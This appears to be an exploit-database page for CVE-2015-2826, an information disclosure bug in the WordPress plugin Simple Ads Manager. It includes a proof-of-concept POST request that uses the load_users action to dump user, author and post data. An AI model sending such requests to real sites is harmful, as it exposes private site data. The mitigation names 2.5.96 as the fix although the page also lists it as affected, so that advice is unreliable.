header-logo
Suggest Exploit
vendor:
Simple Ads Manager
by:
Nguyen Hung Tuan & ITAS Team
5.3
CVSS
MEDIUM
Information Disclosure
200
CWE
Product Name: Simple Ads Manager
Affected Version From: 2.5.94
Affected Version To: 2.5.96
Patch Exists: YES
Related CWE: CVE-2015-2826
CPE: a:wordpress:simple_ads_manager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2015

WordPress plugin Simple Ads Manager – Information Disclosure

A vulnerability in the Wordpress plugin Simple Ads Manager allows an attacker to gain access to sensitive information such as user and author details, categories, tags, posts, and stats. The vulnerable file is simple-ads-manager/sam-ajax-admin.php and the vulnerable function is load_users. An attacker can exploit this vulnerability by sending a POST request to the vulnerable file with the action parameter set to load_users.

Mitigation:

Users should update to the latest version of the plugin (2.5.96) to mitigate this vulnerability.
Source

Exploit-DB raw data:

#Vulnerability title: Wordpress plugin Simple Ads Manager - Information Disclosure
#Product: Wordpress plugin Simple Ads Manager
#Vendor: https://profiles.wordpress.org/minimus/
#Affected version: Simple Ads Manager 2.5.94 and 2.5.96
#Download link: https://wordpress.org/plugins/simple-ads-manager/
#CVE ID:  CVE-2015-2826
#Author: Nguyen Hung Tuan (tuan.h.nguyen@itas.vn) & ITAS Team


::PROOF OF CONCEPT::

+ REQUEST
POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

action=load_users



+ Function list: load_users, load_authors, load_cats, load_tags, load_posts, posts_debug, load_stats,...
+ Vulnerable file: simple-ads-manager/sam-ajax-admin.php
+ Image: http://www.itas.vn/uploads/newsother/disclosure.png

+ REFERENCE: 
- http://www.itas.vn/news/ITAS-Team-found-out-multiple-critical-vulnerabilities-in-Hakin9-IT-Security-Magazine-78.html?language=en

Navigation

Suggest Exploit

Services By CQR